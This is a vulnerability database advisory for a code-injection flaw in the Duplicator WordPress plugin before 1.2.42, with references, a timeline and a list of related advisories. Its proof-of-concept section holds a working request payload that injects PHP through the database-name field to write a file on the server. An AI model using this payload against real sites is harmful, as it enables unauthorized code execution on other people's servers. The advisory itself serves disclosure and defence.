Duplicator < 1.2.42 – Unauthenticated Arbitrary Code Execution | Plugin Vulnerabilities

Description

If installer files, installer.php and installer-backup.php, are not removed by the administrators, a code injection during the database setup step allows to execute arbitrary code on the server.

Proof of Concept

action_ajax=3&action_step=3&dbhost=nowhere&dbuser=test&dbpass=test&dbname=test');
file_put_contents("test.php", '<pre><?php if (isset($_GET["synacktiv_backdoor"])) { echo "test"; } ?></pre>'); /*&dbport=12345&

Affects Plugins

Fixed in 1.2.42

References

URL

https://www.synacktiv.com/ressources/advisories/WordPress_Duplicator-1.2.40-RCE.pdf

URL

https://snapcreek.com/duplicator/docs/changelog?lite

Classification

Type

RCE

OWASP top 10

CWE

Miscellaneous

Original Researcher

Thomas Chauchefoin / Julien Legras

Submitter

Thomas Chauchefoin / Julien Legras

Submitter website

https://synacktiv.com

Verified

No

WPVDB ID

9e170b72-a46e-4eb6-9441-531a2507f7cc

Timeline

Publicly Published

2018-09-05 (about 7 years ago)

Added

2018-09-05 (about 7 years ago)

Last Updated

2020-02-20 (about 6 years ago)

Other

Published

Title

Published

2025-11-13

Title

Debug Tool <= 2.2 - Unauthenticated Remote Code Execution

Published

2025-01-30

Title

Borderless – Widgets, Elements, Templates and Toolkit for Elementor & Gutenberg < 1.6.1 - Authenticated (Administrator+) Remote Code Execution

Published

2025-09-16

Title

WP Import – Ultimate CSV XML Importer for WordPress 7.20 - 7.28 - Authenticated (Subscriber+) Remote Code Execution via Code Injection

Published

2026-03-23

Title

Nelio A/B Testing – AB Tests and Heatmaps for Better Conversion Optimization < 8.2.8 - Authenticated (Editor+) Remote Code Execution

Published

2026-03-23

Title

Mixed Media Gallery Blocks < 3.3.2.1 - Authenticated (Contributor+) Remote Code Execution